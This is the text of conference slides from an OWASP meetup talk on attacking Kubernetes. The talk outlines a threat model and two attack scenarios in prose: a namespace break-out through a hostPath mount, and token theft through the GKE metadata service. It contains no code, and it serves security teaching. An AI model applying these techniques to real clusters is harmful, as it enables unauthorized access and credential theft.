Kubernetes From an Attacker's Perspective Abhisek Datta Head, Security Products Appsecco

OWASP Bay Area Meetup Group https://www.meetup.com/Bay-Area-OWASP/

About Me – Abhisek Datta • Head, Security Products (appsecco.com) • Application & Cloud Security • Kubernetes Cluster Security Assessments • TechWing @ null0x00 (null.co.in) • An Open Security Community • Security Researcher • Discovered vulnerabilities in enterprise software and credited with CVE • Open Source Contributor • https://github.com/abhisek @abh1sek on Twitter

1. A quick introduction to Kubernetes 2. Kubernetes from an Attacker's Perspective 3. Attacking Kubernetes (Scenarios) Key Take Away

My Environment I have a cluster setup on Google Kubernetes Engine (GKE) for demo

What is Kubernetes?

What is Kubernetes? https://www.youtube.com/watch?v=4ht22ReBjno

Kubernetes: The Container Orchestration Platform https://v1-16.docs.kubernetes.io/docs/concepts/overview/components/

Kubernetes from an Attacker's Perspective

Simple Threat Model WHO ARE THE ATTACKERS? WHAT CAN THEY ATTACK? HOW CAN THEY ATTACK?

1. External attackers – No access to cluster 2. Internal attackers – Attacker in a Pod 3. Privileged attackers – Some access to cluster Who are the attackers?

• Etcd Database • Secrets • Credentials • Certificates • PKI Information • Volumes (Storage) • Container Images (May be) • Network Services • Etc. What can they attack?

How can they attack? 1. What is exposed outside the cluster? 2. What is exposed inside the cluster? 3. What is exposed in the cloud environment?

Kubernetes: From an Attacker's Perspective https://v1-16.docs.kubernetes.io/docs/concepts/overview/components/

Master OS Services API Server Other master components Node(s) OS Services Kubelet Container Runtimes Network Services Storage Volumes Apps Security Vulnerability Configuration Weaknesses External Exposure

Service Account Privileges Pod Network Service Network Volumes Configs & Secrets Environmental Information Internal Trust Internal Exposure – Attacker in a Pod Everything available to an External Attacker + Many More

1. Identity & Access Management 2. Meta-data Service 3. Storage 1. Object & Block storage services 2. Container Registry 4. Other cloud services Cloud Exposure

Attacking Kubernetes Cluster

1. Namespace break-out using insecure hostPath volume mount 2. Lateral movement in the cloud – Exploit GKE Instance meta-data endpoint service Attacking Kubernetes

Hands-on Attacks Demo

Namespace Break-out using hostPath Volume Mount • I am a developer and have access to CRUD Pod in developers namespace • I am an attacker and just gained access to a Pod with CI/CD engine that needs to create more Pods to run build jobs Assume any one of the following • We can create Pod, but we are hopefully, greatly restricted to a single namespace Bottom line

Namespace Break-out using hostPath Volume Mount Kubernetes supports mounting hostPath inside a container This is known and documented to be insecure.. But who cares? We use this feature to access the underlying Node's filesystem from our Pod We can then interact with the Docker Daemon on host Usually its game over by now

Lateral Movement in the Cloud – Exploiting Instance Meta-data on GKE Assume • We have access to any Pod in a Kubernetes Cluster running in Google Kubernetes Engine (GKE) Why? • We can access the default instance metadata service available to instances in Google Cloud • We want to break-out of the cluster and access other cloud resources

• Generate access token using metadata service • Check token scopes • Access cloud resources using generated access token • Cloud Storage • Cloud Registry • Etc. Lateral Movement in the Cloud - Exploiting Instance Meta-data on GKE CIS GKE Benchmark Recommendation: 6.2.1. Prefer not running GKE clusters using the Compute Engine default service account

Kubernetes Attack Matrix https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

• The Illustrated Children's Guide to Kubernetes • https://www.cncf.io/the-childrens-illustrated-guide-to-kubernetes/ • Get started with learning Docker (Containers) • https://www.katacoda.com/courses/docker • Get started with learning Kubernetes using Katacoda • https://www.katacoda.com/courses/kubernetes • Attacking and Auditing Docker Containers and Kubernetes Clusters – Our recently released training material • https://bit.ly/k8s-pentesting More Resources

• https://www.cisecurity.org/benchmark/docker/ • https://www.cisecurity.org/benchmark/kubernetes/ • https://cloud.google.com/kubernetes- engine/docs/concepts/cis-benchmarks • https://www.cisecurity.org/benchmark/ubuntu_linux/ (Relevant) CIS Benchmarks

Questions? [email protected] That’s all for now.. https://appsecco.com @abh1sek github.com/abhisek